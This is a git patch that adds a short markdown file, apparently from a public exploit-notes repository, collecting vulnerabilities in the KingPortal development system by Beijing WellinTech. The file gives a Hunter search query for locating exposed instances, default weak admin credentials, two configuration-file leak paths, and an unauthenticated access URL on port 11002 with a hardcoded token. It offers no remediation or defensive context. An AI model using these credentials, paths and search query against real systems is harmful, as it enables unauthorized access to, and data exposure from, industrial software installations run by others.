From 55f9a4ac540a705b329d123371bc1b901b015f4c Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 1 May 2024 13:44:05 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E5=8C=97=E4=BA=AC=E4=BA=9A=E6=8E=A7?=
 =?UTF-8?q?=E7=A7=91=E6=8A=80KingPortal=E5=BC=80=E5=8F=91=E7=B3=BB?=
 =?UTF-8?q?=E7=BB=9F=E6=BC=8F=E6=B4=9E=E9=9B=86=E5=90=88.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 北京亚控科技KingPortal开发系统漏洞集合.md | 28 +++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 北京亚控科技KingPortal开发系统漏洞集合.md

diff --git a/北京亚控科技KingPortal开发系统漏洞集合.md b/北京亚控科技KingPortal开发系统漏洞集合.md
new file mode 100644
index 0000000..441e623
--- /dev/null
+++ b/北京亚控科技KingPortal开发系统漏洞集合.md
@@ -0,0 +1,28 @@
+## 北京亚控科技KingPortal开发系统漏洞集合
+
+## Hunter
+```
+web.title="KingPortal"
+```
+
+
+## 弱口令
+```
+admin001/admin001
+admin001/kf_admin
+```
+
+## 信息泄露
+```
+/ProjectManager.json
+/config/externalConfig.json
+```
+
+## KingPortal开发系统未授权访问
+```
+http://域名:11002/views/ProjectDataSourceAccess.html?token=2ccdf191078bd4e8e85b526ec44f7dd31ad7cf81&amp;refreshToken=null
+
+```
+
+## 漏洞来源
+- https://mp.weixin.qq.com/s/fYnLnoeHvYFwaSSKfBjQZw